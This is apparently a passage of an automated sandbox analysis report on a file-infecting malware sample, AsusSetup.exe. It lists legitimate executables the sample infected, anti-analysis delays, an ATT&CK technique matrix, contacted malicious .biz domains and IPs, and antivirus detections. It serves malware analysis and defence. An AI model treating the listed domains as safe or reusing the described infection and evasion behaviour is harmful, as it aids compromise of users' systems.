Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7z.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exeDropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-5674
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_10-3902
Source: C:\Windows\System32\FXSSVC.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_9-3895
Source: C:\Windows\System32\AppVClient.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_6-3900
Source: C:\Users\user\Desktop\AsusSetup.exe TID: 6856Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\alg.exe TID: 6936Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\alg.exe TID: 6864Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\alg.exeThread delayed: delay time: 60000Jump to behavior
Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior
Source: AsusSetup.exe, 00000000.00000003.1712795088.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000003.1740569192.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000003.1728137522.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000002.1742470565.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000003.1739817164.0000000000579000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000003.1737995229.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000002.1742470565.0000000000582000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000003.1713128662.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000003.1740569192.0000000000581000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1791243483.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2212486448.000000000053F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: AsusSetup.exe, 00000000.00000003.1712795088.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000003.1740569192.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000003.1728137522.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000002.1742470565.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000003.1737995229.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000003.1713128662.00000000005CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWi
Source: AppVClient.exe, 00000006.00000002.1714516196.00000000005EE000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000006.00000003.1713667739.00000000005D7000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000006.00000003.1713537431.00000000005D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appv:SoftwareClients/appv:JavaVirtualMachine
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\alg.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\AppVClient.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TSTB4E.tmp VolumeInformationJump to behavior
Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TSTB4F.tmp VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeCode function: 0_2_00000001401CB8F4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00000001401CB8F4

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		2
LSASS Driver		1
Process Injection		222
Masquerading		11
Input Capture		1
System Time Discovery		1
Taint Shared Content		11
Input Capture		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Native API		1
DLL Side-Loading		2
LSASS Driver		11
Virtualization/Sandbox Evasion		LSASS Memory11
Security Software Discovery		Remote Desktop Protocol1
Archive Collected Data		2
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading		1
Process Injection		Security Account Manager11
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
Obfuscated Files or Information		NTDS1
File and Directory Discovery		Distributed Component Object ModelInput Capture13
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Software Packing		LSA Secrets12
System Information Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Timestomp		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1543957 Sample: AsusSetup.exe Startdate: 28/10/2024 Architecture: WINDOWS Score: 96 33 zlenh.biz 2->33 35 zjbpaao.biz 2->35 37 85 other IPs or domains 2->37 51 Suricata IDS alerts for network traffic 2->51 53 Antivirus detection for dropped file 2->53 55 Antivirus / Scanner detection for submitted sample 2->55 57 5 other signatures 2->57 6 alg.exe 1 2->6         started        11 AsusSetup.exe 1 2->11         started        13 FXSSVC.exe 15 4 2->13         started        15 6 other processes 2->15 signatures3 process4 dnsIp5 39 hlzfuyy.biz 34.211.97.45, 49769, 49824, 49850 AMAZON-02US United States 6->39 41 dlynankz.biz 85.214.228.140, 49881, 80 STRATOSTRATOAGDE Germany 6->41 49 15 other IPs or domains 6->49 17 C:\Program Files\...\updater.exe, PE32+ 6->17 dropped 19 C:\Program Files\...\private_browsing.exe, PE32+ 6->19 dropped 21 C:\Program Files\...\plugin-container.exe, PE32+ 6->21 dropped 29 116 other malicious files 6->29 dropped 59 Creates files in the system32 config directory 6->59 61 Drops executable to a common third party application directory 6->61 63 Infects executable files (exe, dll, sys, html) 6->63 43 acwjcqqv.biz 18.141.10.107, 49731, 49733, 49741 AMAZON-02US United States 11->43 45 zrlssa.biz 44.221.84.105, 49735, 49737, 49738 AMAZON-AESUS United States 11->45 47 ywffr.biz 54.244.188.177, 49730, 49732, 49734 AMAZON-02US United States 11->47 23 C:\Windows\System32\alg.exe, PE32+ 11->23 dropped 25 C:\Windows\System32\FXSSVC.exe, PE32+ 11->25 dropped 27 DiagnosticsHub.Sta...llector.Service.exe, PE32+ 11->27 dropped 31 4 other malicious files 11->31 dropped 65 Contains functionality to behave differently if execute on a Russian/Kazak computer 11->65 file6 signatures7

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
AsusSetup.exe100%AviraW32/Infector.Gen
AsusSetup.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Check.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Info.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe100%AviraW32/Infector.Gen
